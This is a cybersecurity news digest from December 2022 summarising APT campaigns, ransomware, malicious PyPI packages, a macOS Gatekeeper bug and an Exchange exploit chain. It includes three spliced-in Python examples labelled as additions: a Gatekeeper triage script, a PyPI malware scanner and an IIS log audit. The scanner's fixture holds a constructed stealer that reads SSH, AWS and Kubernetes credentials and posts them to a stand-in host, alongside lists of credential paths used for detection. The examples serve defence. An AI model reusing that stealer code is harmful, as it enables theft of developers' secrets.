Wednesday, December 21, 2022 // (IG): BB // THM:Windows RE // Coffee for Bob
Russia-linked Gamaredon APT targeted a petroleum refining company in a NATO nation in August
FROM THE MEDIA: A hacking group associated with Russia’s Federal Security Service (FSB) unsuccessfully attempted to compromise a large petroleum refining company within a NATO member state at the end of August, according to a new report. The advanced persistent threat group, known as Trident Ursa (also referred to as Gamaredon, Primitive Bear and Shuckworm), is “a specially created structural unit“ of the FSB “whose tasks are intelligence and subversive activities against Ukraine in cyberspace,” in the analysis of Ukraine’s Security Service. It primarily uses HTML and Word documents as spear phishing lures. Alongside its traditional Ukrainian-language lures aimed at Ukrainian entities, the group is now increasingly using English-language lures, according to research published Tuesday by Palo Alto Networks’ Unit 42.
READ THE STORY: Security Affairs // The Record // CNN Politics // BankInfoSec
Military operations software in Ukraine was breached by Russian hackers
FROM THE MEDIA: Hackers targeted software critical to Ukraine’s military efforts with information-stealing malware, Ukraine’s Computer Emergency Response Team (CERT-UA) reported last week. The attackers sent messages in mid-December from a hacked email address belonging to a Ukraine Ministry of Defense employee to users of the program, which is called Delta. CERT-UA publicized the breach a few days later, on December 18. Military commanders and soldiers have access to the platform, which is the “eyes” of the Ukrainian armed forces. It collects data on everything happening on the ground, in the sea, in the air, in space, and in cyberspace using drones, satellite images, electronic warfare systems, or surveillance cameras.
READ THE STORY: The Record
CrowdStrike Identifies New Exploit Method for Exchange Bypassing ProxyNotShell Mitigations
FROM THE MEDIA: CrowdStrike Services recently investigated several Play ransomware intrusions where the common entry vector was suspected to be the Microsoft Exchange ProxyNotShell vulnerabilities CVE-2022-41040 and CVE-2022-41082. In each case, CrowdStrike reviewed the relevant logs and determined there was no evidence of exploitation of CVE-2022-41040 for initial access. Instead, it appeared that the corresponding requests were made directly through the Outlook Web Access (OWA) endpoint, indicating a previously undisclosed exploit method for Exchange.
READ THE STORY: CrowdStrike
Ukraine attacks changed Russian GPS jamming
FROM THE MEDIA: Two Russian airbases deep inside the country were attacked on December 5: the Engels-2 base in the Saratov region and Dyagilevo near Ryazan. The next day an oil tank at the Kursk airfield closer to the border with Ukraine was hit and set on fire. Reports from Russian witnesses and unofficial sources in Ukraine indicate that the attacks were carried out with UAVs operated by the Ukrainian military. The Russian government has long interfered with reception of GPS signals, especially near and within its own borders. The early December attacks seem to have motivated an increase in this activity. Information displayed by the website GPSJam.org indicates that, on the first day of the attacks, GPS interference was detected around Moscow, at two airbases to the east, and near the Engels-2 airbase. GPSJam.org uses anomalies in crowdsourced aviation ADS-B data as an indicator of unreliable GPS signals.
READ THE STORY: GPS World
Why an ASAT Test Ban Is Important
FROM THE MEDIA: There is growing momentum behind a global moratorium on destructive kinetic anti-satellite (ASAT) tests. A few days ago, the United Nations General Assembly (UNGA) passed a resolution calling for a ban on kinetic ASAT tests. The resolution was sponsored by the United States along with a number of other countries that have been concerned about the consequences of ASAT tests on the safety and sustainability of outer space. As many as 155 countries voted in support of the resolution, nine voted against it, and nine others abstained. Those who voted against the resolution were Belarus, Bolivia, Central African Republic, China, Cuba, Iran, Nicaragua, Russia, and Syria. The nine abstentions were India, Laos, Madagascar, Pakistan, Serbia, Sri Lanka, Sudan, Togo, and Zimbabwe.
READ THE STORY: ORF
German industrial giant ThyssenKrupp targeted in a new cyberattack
FROM THE MEDIA: German multinational industrial engineering and steel production giant ThyssenKrupp AG announced that its Materials Services division and corporate headquarters were hit by a cyberattack. The company has yet to disclose the type of attack that hit its systems, and no cybercriminal group has claimed responsibility. A spokesperson told Agence France-Presse that “Thyssenkrupp is currently the target of a cyberattack — presumably by organized crime” and that “at the present time, no damage has been done, nor are there any indications that data has been stolen or modified.”
READ THE STORY: Security Affairs // siliconANGLE
'Russian hackers' help two New York men game JFK taxi system
FROM THE MEDIA: A pair of men living in New York, working with unnamed Russian nationals, hacked and manipulated the electronic taxi dispatch system at John F. Kennedy International Airport as part of a money-making scheme over a period of at least two years, federal prosecutors said Tuesday. Starting in at least September 2019, Daniel Abayev and Peter Leyman ran a pay-to-play system for cabbies who could jump the line instead of idling in a holding lot until hailed by a dispatcher, prosecutors with the Southern District of New York said in a statement. Leyman allegedly charged taxi drivers $10 each time they skipped ahead and waived the $10 fee for drivers who recruited more paying drivers.
READ THE STORY: Cyberscoop
Can hardware wallets be hacked
FROM THE MEDIA: Managing cryptocurrency assets can be done in a custodial or non-custodial way. Those who opt for the latter often use a hardware wallet, which provides many benefits but also has a steep learning curve. Even then, the question remains: are these devices 100% secure? There are many good reasons why so many crypto users rely on hardware wallets to protect their assets. Unlike a software wallet, the hardware unit doesn’t connect to the internet directly. Instead, it often requires a computer or mobile device connection, introducing an extra security layer. Moreover, the private keys and seed phrases are only stored locally. That means no one can access them without physical access to the device and the necessary credentials to use funds.
READ THE STORY: OODALOOP
Ransomware Hackers Using New Way to Bypass MS Exchange ProxyNotShell Mitigations
FROM THE MEDIA: Threat actors affiliated with a ransomware strain known as Play are leveraging a never-before-seen exploit chain that bypasses blocking rules for ProxyNotShell flaws in Microsoft Exchange Server to achieve remote code execution (RCE) through Outlook Web Access (OWA). "The new exploit method bypasses URL rewrite mitigations for the Autodiscover endpoint," CrowdStrike researchers Brian Pitchford, Erik Iker, and Nicolas Zilio said in a technical write-up published Tuesday. Play ransomware, which first surfaced in June 2022, has been observed adopting many tactics employed by other ransomware families such as Hive and Nokoyawa, the latter of which upgraded to Rust in September 2022.
READ THE STORY: THN
Clop ransomware group targeting provider-patient trust by infecting medical images
FROM THE MEDIA: The healthcare sector has long been warned that it is not keeping pace with evolving threats, creating an untenable situation with serious impacts. New insights from Hold Security show Clop ransomware actors are upping the ante, targeting the trusted relationships between providers and patients to deliver their payload. The risk to healthcare is greater than before. Hold Security Founder Alex Holden warns that “the message is simple: all medical professionals need to get better because the bad guys are stepping up. We need to speed up.” In May, the Department of Health and Human Services Cybersecurity Coordination Center alerted the sector to the consistency of ransomware attacks on providers over the year, with a rise in access brokers selling access to healthcare networks to other groups and affiliates.
READ THE STORY: SCMAG
Stolen Events DC files exposed by BlackCat ransomware gang
FROM THE MEDIA: District of Columbia convention and sports authority Events D.C. had files stolen from a cyberattack first reported two months ago leaked by the BlackCat ransomware gang, also known as ALPHV, last week, reports StateScoop. BlackCat has posted screenshots of an 85 GB cache showing a file directory with numerous folders containing workforce and operations information, adding that all of the stolen data has been posted after Events D.C. refused to pay the demanded ransom. "We're evaluating this apparent release of our data," said Events D.C., which operates the DC Armory and owns the Nationals Park baseball stadium, in a statement.
READ THE STORY: SCMAG
Malicious PyPI package found posing as a SentinelOne SDK
FROM THE MEDIA: Threat researchers have found a rapidly updated malicious Python package on PyPI masquerading as a legitimate software-development kit (SDK) from cybersecurity firm SentinelOne that actually contained malware designed to exfiltrate data from infected systems. The package, which carried the name SentinelOne and has since been taken down, was uploaded to the Python Package Index – an online index of packages for Python developers – on December 11 and was updated 20 times over two days. It promised a simpler way to access and consume SentinelOne's APIs but included backdoor malware that enabled it to steal sensitive information from developers' systems, including SSH keys, credentials, configuration and host files, and configuration information from Amazon Web Services and Kubernetes.
READ THE STORY: The Register
Gatekeeper bypass exposes Macs to malware
FROM THE MEDIA: Microsoft has gone public with an analysis of a macOS Gatekeeper bug it discovered in July, dubbed Achilles, following patch releases by Apple last week. The bug, CVE-2022-42821, exists in macOS Monterey, Big Sur, and Ventura and allows an app to bypass Gatekeeper checks. Gatekeeper inspects apps users download from the Internet: if the app is signed by an identified developer and notarized by Apple, the user is asked to confirm they wish to launch it; if not, the app is untrusted and execution is refused. What Microsoft threat researcher Jonathan Bar Or discovered is that an attacker could use macOS access control lists (ACLs) to bypass Gatekeeper.
READ THE STORY: iTNews // The Register
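Gatekeeper only evaluates a file that carries the com.apple.quarantine extended attribute, which the downloading application is expected to set. The following is an added example, not code from Microsoft, Apple or the articles above: a small triage script that classifies a downloaded file from two inputs, the names of its extended attributes and the ACL entries shown by `ls -le`. It assumes (this example's own assumption, not a statement from the page) that the ACL of interest is one that denies writing extended attributes, since such an entry would stop the quarantine flag from being applied. The sample `ls -le` output is constructed.

```python
import subprocess
import sys

QUARANTINE_XATTR = "com.apple.quarantine"

# Constructed `ls -le` output for one file (not from a real system). On macOS a
# '+' after the mode bits means an ACL is present and its entries follow.
SAMPLE_LS = """\
-rwxr-xr-x+ 1 user  staff  12345 Dec 21 10:00 Example.app/Contents/MacOS/Example
 0: group:everyone deny write,writeattr,writeextattr,writesecurity,chown
"""


def parse_acl_entries(ls_output):
    """Pull the numbered ACL entry lines ('0: group:everyone deny ...') out of `ls -le` output."""
    entries = []
    for line in ls_output.splitlines():
        s = line.strip()
        head = s.split(" ", 1)[0]
        if head.endswith(":") and head[:-1].isdigit():
            entries.append(s)
    return entries


def denies_xattr_write(entry):
    """True for an entry that denies writing extended attributes.

    Assumption of this example: such an entry is what prevents the downloading
    app from setting com.apple.quarantine, so Gatekeeper never gets involved.
    """
    parts = entry.split()
    if len(parts) < 4 or parts[2] != "deny":
        return False
    return "writeextattr" in parts[3].split(",")


def classify(xattrs, acl_entries):
    """Decide how Gatekeeper will treat a file given its xattr names and ACL entries."""
    if QUARANTINE_XATTR in xattrs:
        return "quarantined"    # Gatekeeper evaluates it on first launch
    if any(denies_xattr_write(e) for e in acl_entries):
        return "suspect"        # no flag, and an ACL that would have blocked setting one
    return "unquarantined"      # no flag, e.g. built locally or copied from a trusted path


def inspect(path):
    """Collect the real data on macOS; parsing and classification above are platform-neutral."""
    if sys.platform != "darwin":
        raise RuntimeError("inspect() needs macOS; call classify() with collected data elsewhere")
    xattrs = subprocess.run(["xattr", path], capture_output=True, text=True, check=True).stdout.split()
    ls_out = subprocess.run(["ls", "-led", path], capture_output=True, text=True, check=True).stdout
    return classify(xattrs, parse_acl_entries(ls_out))


if __name__ == "__main__":
    if len(sys.argv) > 1:
        print(sys.argv[1], inspect(sys.argv[1]))
    else:
        print("constructed sample:", classify([], parse_acl_entries(SAMPLE_LS)))
```

A "suspect" verdict is a starting point for a look at where the file came from (browser download history, archive extraction logs), not proof of exploitation: a developer can legitimately strip quarantine from their own builds, and the patched macOS versions no longer let this ACL trick suppress the flag.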
Raspberry Robin worm drops fake malware to confuse researchers
FROM THE MEDIA: The Raspberry Robin malware is now trying its hand at some trickery by dropping a fake payload to confuse researchers and evade detection when it detects it's being run within sandboxes and debugging tools. This new tactic was discovered by Trend Micro researchers who observed Raspberry Robin in recent attacks against telecommunication service providers and government systems. Raspberry Robin is a worm-like malware dropper that sells initial access to compromised networks to ransomware gangs and malware operators. It has been previously associated with FIN11 and the Clop gang, as well as Bumblebee, IcedID, and TrueBot payload distribution.
READ THE STORY: Bleeping Computer
GodFather Android Banking Trojan Targeting Users of Over 400 Banking and Crypto Apps
FROM THE MEDIA: An Android banking trojan known as GodFather is being used to target users of more than 400 banking and cryptocurrency apps spanning 16 countries. This includes 215 banks, 94 crypto wallet providers, and 110 crypto exchange platforms serving users in the U.S., Turkey, Spain, Italy, and Canada, among others, Singapore-headquartered Group-IB said in a report shared with The Hacker News. The malware, like many financial trojans targeting the Android ecosystem, attempts to steal user credentials by generating convincing overlay screens (aka web fakes) that are served atop target applications.
READ THE STORY: THN
Hackers bombard PyPI platform with information-stealing malware
FROM THE MEDIA: The PyPI Python package repository is being bombarded by a wave of information-stealing malware hiding inside malicious packages uploaded to the platform to steal software developers' data. The malware dropped in this campaign is a clone of the open-source W4SP Stealer, responsible for a previous widespread malware infection on PyPI in November 2022. Since then, an additional 31 packages dropping 'W4SP' have been removed from the PyPI repository, with the malware's operators continuing to seek new ways to reintroduce their malware on the platform.
READ THE STORY: Bleeping Computer
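Both PyPI items (the SentinelOne lookalike above and the W4SP clones here) follow the same pattern: a package that reads developer credentials from well-known paths and has a way to send them out, sometimes from setup.py so that it runs at pip install time. The following is an added example, not code from the page or from the researchers it cites: a small static pre-install scanner over a package's Python files, run against two constructed packages, a lookalike that harvests files and a plain API client. The path patterns, module list, risk rules and package contents are this example's own assumptions.

```python
import ast
import re

# Paths a developer-facing SDK has no business reading (assumed list for this example).
SENSITIVE_PATH_PATTERNS = [
    r"\.ssh(/|$)", r"id_rsa", r"\.aws/credentials", r"\.kube/config",
    r"/etc/hosts", r"\.docker/config\.json",
]
# Modules that give the package a way to send data out.
NETWORK_MODULES = {"requests", "urllib", "http", "socket", "httpx"}
# Calls that hide or stage a payload, or hand control to the shell.
DYNAMIC_EXEC = {"exec", "eval", "compile", "b64decode", "decompress", "system", "Popen", "check_output"}


def _call_name(func):
    """Bare name of a call target: exec(...), base64.b64decode(...), os.system(...)."""
    if isinstance(func, ast.Name):
        return func.id
    if isinstance(func, ast.Attribute):
        return func.attr
    return None


def scan_source(source, filename):
    """Return (filename, lineno, kind, detail) findings for one Python file."""
    findings = []
    for node in ast.walk(ast.parse(source, filename)):
        if isinstance(node, ast.Constant) and isinstance(node.value, str):
            for pat in SENSITIVE_PATH_PATTERNS:
                if re.search(pat, node.value):
                    findings.append((filename, node.lineno, "sensitive-path", node.value))
                    break
        elif isinstance(node, ast.Import):
            for alias in node.names:
                if alias.name.split(".")[0] in NETWORK_MODULES:
                    findings.append((filename, node.lineno, "network-import", alias.name))
        elif isinstance(node, ast.ImportFrom) and node.module:
            if node.module.split(".")[0] in NETWORK_MODULES:
                findings.append((filename, node.lineno, "network-import", node.module))
        elif isinstance(node, ast.Call):
            name = _call_name(node.func)
            if name in DYNAMIC_EXEC:
                findings.append((filename, node.lineno, "dynamic-exec", name))
    return findings


def scan_package(files):
    """files maps relative path -> source text (as unpacked from an sdist). Returns (risk, findings)."""
    findings = []
    for path, src in files.items():
        if path.endswith(".py"):
            findings.extend(scan_source(src, path))
    kinds = {k for _, _, k, _ in findings}
    kinds_in_setup = {k for f, _, k, _ in findings if f == "setup.py"}
    if kinds_in_setup & {"network-import", "dynamic-exec"}:
        risk = "high"    # runs at pip install time and talks out or decodes a payload
    elif {"sensitive-path", "network-import"} <= kinds:
        risk = "high"    # reads credential files and has a channel to send them
    elif kinds & {"sensitive-path", "dynamic-exec"}:
        risk = "medium"
    else:
        risk = "low"
    return risk, findings


SETUP_PY = "from setuptools import setup\nsetup(name='vendor-sdk', version='1.0', packages=['vendor_sdk'])\n"

# Constructed lookalike: advertises an API client, harvests files on import.
LOOKALIKE = {
    "setup.py": SETUP_PY,
    "vendor_sdk/__init__.py": (
        "import os, base64, requests\n"
        "class Client:\n"
        "    def __init__(self, token):\n"
        "        self.token = token\n"
        "def _collect():\n"
        "    home = os.path.expanduser('~')\n"
        "    targets = [home + '/.ssh/id_rsa', home + '/.aws/credentials', home + '/.kube/config', '/etc/hosts']\n"
        "    return {t: open(t).read() for t in targets if os.path.exists(t)}\n"
        "def _send():\n"
        "    requests.post('https://example.invalid/upload', data=base64.b64encode(repr(_collect()).encode()))\n"
        "_send()\n"
    ),
}

# Constructed benign client: talks to an API, touches nothing on disk.
BENIGN = {
    "setup.py": SETUP_PY,
    "vendor_sdk/__init__.py": (
        "import requests\n"
        "class Client:\n"
        "    def __init__(self, base_url, token):\n"
        "        self.base_url, self.token = base_url, token\n"
        "    def get(self, path):\n"
        "        return requests.get(self.base_url + path, headers={'Authorization': 'ApiToken ' + self.token}).json()\n"
    ),
}

if __name__ == "__main__":
    for label, pkg in (("lookalike", LOOKALIKE), ("benign", BENIGN)):
        risk, findings = scan_package(pkg)
        print(f"{label}: risk={risk}")
        for f, line, kind, detail in findings:
            print(f"  {f}:{line} {kind} {detail!r}")
```

Run this over the unpacked sdist before `pip install` (or as a gate in CI that resolves dependencies from a lockfile). A benign SDK will usually show only network imports; credential paths or base64/exec calls next to them, and anything beyond `setup()` in setup.py, are worth reading by hand before the package ever executes.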
Appeals court rejects China Telecom bid to reverse US ban
FROM THE MEDIA: A federal appeals court on Tuesday rejected China Telecom Corp’s challenge to a Federal Communications Commission order withdrawing the company’s authority to provide services in the United States. A three-judge panel of the US Court of Appeals for the District of Columbia rejected the bid by the US arm of China Telecom to reverse the order that took effect in January. The FCC said in 2021 that China Telecom (Americas) “is subject to exploitation, influence and control by the Chinese government.” A lawyer for China Telecom (Americas) did not immediately comment. The appeals court panel did not immediately make its opinion public.
READ THE STORY: CNN
Cyber National Mission Force to bolster efforts vs foreign threats with elevated status
FROM THE MEDIA: The Cyber National Mission Force has been upgraded to a "subordinate unified command" under the U.S. Cyber Command by the Department of Defense following its integral role in Cyber Command's efforts in strengthening election security, bolstering Ukraine's defenses in combating Russian cyber threats, and battling ransomware and cyberespionage attacks, reports The Record, a news site by cybersecurity firm Recorded Future. CNMF's new designation would provide it more agility in responding to threats. More than 60 networks across 21 countries have been examined by hunt forward teams sent by the CNMF over the past four years, with Ukraine, Croatia, and Lithuania receiving such assistance this year.
READ THE STORY: SCMAG
Cisco’s Talos security bods predict new wave of Excel Hell
FROM THE MEDIA: It took a few years and one temporary halt, but in July Microsoft finally began blocking certain macros by default in Word, Excel, and PowerPoint, cutting off a popular attack vector for those who target users of Microsoft's Windows OS and Office suite. While recent versions of Office block Visual Basic for Applications (VBA) macros by default, older versions of the suite and its component programs remain enormously prevalent. Blocking macros therefore won't deter cybercriminals from targeting Microsoft's signature productivity applications. They'll just have to find other options. A report released on Tuesday by researchers from Cisco's Talos threat intelligence group dissected one: XLL files in Excel.
READ THE STORY: The Register
Ransomware gang uses new Microsoft Exchange exploit to breach servers
FROM THE MEDIA: Play ransomware threat actors are using a new exploit chain that bypasses ProxyNotShell URL rewrite mitigations to gain remote code execution (RCE) on vulnerable servers through Outlook Web Access (OWA). Cybersecurity firm CrowdStrike spotted the exploit (dubbed OWASSRF) while investigating Play ransomware attacks where compromised Microsoft Exchange servers were used to infiltrate the victims' networks. To execute arbitrary commands on compromised servers, the ransomware operators leveraged Remote PowerShell to abuse CVE-2022-41082, the same bug exploited by ProxyNotShell.
READ THE STORY: Bleeping Computer
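The mitigation being bypassed (in this item and the two earlier CrowdStrike items on this page) is the IIS URL Rewrite rule Microsoft published for ProxyNotShell, which only inspects the decoded request URI for the Autodiscover path. The following is an added example, not code from CrowdStrike or this page: it replays constructed IIS log lines through the two rule patterns Microsoft published and lists the requests that reach the PowerShell backend without tripping either one. The sample log lines, the client addresses and the OWA-style path are constructed for illustration; they are not the actual exploit request.

```python
import re
from urllib.parse import unquote

# The two regexes Microsoft published for its URL Rewrite mitigation, applied to
# {UrlDecode:{REQUEST_URI}} with "ignore case". The first (30 Sept) was too
# narrow and was replaced by the lookahead form (8 Oct).
MITIGATIONS = {
    "sept30": re.compile(r".*autodiscover\.json.*\@.*Powershell.*", re.IGNORECASE),
    "oct8": re.compile(r"(?=.*autodiscover)(?=.*powershell)", re.IGNORECASE),
}

# Constructed IIS W3C-style log lines (not real telemetry). Fields:
# date time cs-method cs-uri-stem cs-uri-query sc-status c-ip
SAMPLE_LOG = """\
#Fields: date time cs-method cs-uri-stem cs-uri-query sc-status c-ip
2022-12-01 10:00:01 POST /autodiscover/autodiscover.json a=x@example.com/powershell 200 203.0.113.5
2022-12-01 10:00:02 POST /owa/example%40example.com/powershell - 200 203.0.113.5
2022-12-01 10:00:03 GET /owa/auth/logon.aspx url=/owa/ 200 198.51.100.7
2022-12-01 10:00:04 POST /powershell - 200 10.0.0.12
"""

FIELDS = ["date", "time", "method", "stem", "query", "status", "client"]


def parse_w3c(text):
    """Yield one dict per request line; lines starting with '#' are W3C directives."""
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        yield dict(zip(FIELDS, line.split()))


def request_uri(rec):
    """Rebuild REQUEST_URI as IIS sees it ('-' in the log means no query string)."""
    return rec["stem"] if rec["query"] == "-" else f'{rec["stem"]}?{rec["query"]}'


def blocked_by(uri, pattern):
    """Mimic the rewrite condition: match against the URL-decoded request URI."""
    return pattern.search(unquote(uri)) is not None


def audit(text):
    """Return (uri, client, {rule: blocked}, reaches_powershell) for each request."""
    rows = []
    for rec in parse_w3c(text):
        uri = request_uri(rec)
        verdict = {name: blocked_by(uri, pat) for name, pat in MITIGATIONS.items()}
        # Assumption: a decoded URI ending in the PowerShell virtual directory is
        # being proxied to the backend PowerShell endpoint.
        reaches_ps = unquote(uri).lower().rstrip("/").endswith("/powershell")
        rows.append((uri, rec["client"], verdict, reaches_ps))
    return rows


def unmitigated(text):
    """Requests that reach PowerShell without tripping either rewrite rule."""
    return [uri for uri, _, verdict, ps in audit(text) if ps and not any(verdict.values())]


if __name__ == "__main__":
    for uri, client, verdict, ps in audit(SAMPLE_LOG):
        hits = ",".join(k for k, v in verdict.items() if v) or "none"
        print(f"{client:14} {uri:55} blocked_by={hits:12} reaches_powershell={ps}")
    print("unmitigated:", unmitigated(SAMPLE_LOG))
```

The output is a triage list rather than an alert: the direct `/powershell` request from the internal host is what a legitimate Exchange Management Shell session looks like, so entries have to be correlated with the source address and with PowerShell logging on the server. The more general point is that a rewrite rule keyed on one front-end path was only ever an interim measure; the fix is the Exchange security update that addresses CVE-2022-41082 itself.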
Okta's source code stolen after GitHub repositories hacked
FROM THE MEDIA: Okta, a leading provider of authentication services and Identity and Access Management (IAM) solutions, says that its private GitHub repositories were hacked this month. According to a 'confidential' email notification sent by Okta and seen by BleepingComputer, the security incident involves threat actors stealing Okta's source code. BleepingComputer has obtained a 'confidential' security incident notification that Okta has been emailing to its 'security contacts' as of a few hours ago. We have confirmed that multiple sources, including IT admins, have been receiving this email notification.
READ THE STORY: Bleeping Computer
Bitcoin Ransoms Aren’t Dead: EV Maker NIO Refuses To Pay Up
FROM THE MEDIA: Bitcoin-hungry hackers have unsuccessfully held Chinese electric vehicle maker NIO to ransom and are now selling sensitive customer data online for crypto. Earlier this month, hackers emailed NIO demanding $2.25 million in bitcoin or else they’d release data stolen sometime last year, according to Bloomberg. An internal investigation reportedly revealed some NIO customer and user data had been compromised. But NIO refused to pay. “On Dec. 20, 2022, [NIO] was made aware that certain information of users and vehicle sales in China before Aug. 2021 were sold on the internet by third parties for illegal purposes.”
READ THE STORY: BlockWorks // Automotive News // Reuters
Korean IT expert arrested after hacking into over 400,000 home cameras
FROM THE MEDIA: A South Korean man in his thirties was arrested on Tuesday after hacking into over 400,000 home security cameras and attempting to sell the footage, according to police. The man, identified as Lee, allegedly used his knowledge as a cybersecurity and IT expert to hack into a total of 404,847 cameras in 638 apartment complexes across South Korea between August and November 2021, Yonhap reports. Police said that after creating an automated hacking program, Lee used 10 wireless routers to break into apartment complex servers, which gave him access to the cameras on the wall-mounted control pads of 404,847 apartments. Lee then attempted to sell the personal videos and photos, inviting buyers interested in hidden footage to contact him.
READ THE STORY: Yahoo News
Russian mobile calls, internet seen deteriorating after Nokia, Ericsson leave
FROM THE MEDIA: When telecoms gear makers Nokia and Ericsson leave Russia at the end of the year, their departure could steadily cripple the country's mobile networks over the long-term, setting off a deterioration in communication for everyday Russians. Five senior telecoms executives and other industry sources said Russian mobile phone users will likely experience slower downloads and uploads, more dropped calls, calls that won't connect, and longer outages as operators lose the ability to upgrade or patch software, and battle over dwindling spare parts inventories. Ericsson and Nokia, which together account for a large share of the telecoms equipment market and close to 50% in terms of base stations in Russia, make everything from the telecom antennas to the hardware that connects optical fiber carrying digital signals.
READ THE STORY: Reuters
Items of interest
Russia Acknowledges a Prolonged War: What Does That Mean?
FROM THE MEDIA: Vladimir Putin has now acknowledged that Russia is fighting a protracted war in Ukraine. He has also stated that there will not be another mobilization in the foreseeable future and reiterated that Russia’s strategy is a defensive, retaliatory one, which suggested no nuclear weapons would be used. While the remarks about nuclear weapons should have been gratefully received abroad, Putin on December 8 publicly mused about using them preemptively against the U.S. and NATO. In other words, he is back to making nuclear threats despite pressure from China, India and the West to forego such threats. Since Putin also has recently said that only he can be trusted, and his reputation for mendacity has long since been incontrovertibly established, we are once again left in the position of reading his tea leaves.
READ THE STORY: Real Clear Defense
Electronic Warfare; a Brief Overview of Weaponized RF Design (Video)
FROM THE MEDIA: Whether you are trying to keep a multi-million dollar fighter jet from being shot down or to avoid a speeding ticket from law enforcement, the same radar and electronic warfare equations and concepts apply.
Electronic Warfare on a Budget of $15 or Less (Video)
FROM THE MEDIA: You are constantly being irradiated by a plethora of gadgets and gizmos firing photons through your body every second, so why not figure out how to read those airwaves?
These open source products are reviewed from analysts at InfoDom Securities and provide possible context about current media trends in regard to the realm of cyber security. The stories selected cover a broad array of cyber threats and are intended to aid readers in framing key publicly discussed threats and overall situational awareness. InfoDom Securities does not specifically endorse any third-party claims made in their original material or related links on their sites, and the opinions expressed by third parties are theirs alone. Contact InfoDom Securities at dominanceinformation@gmail.com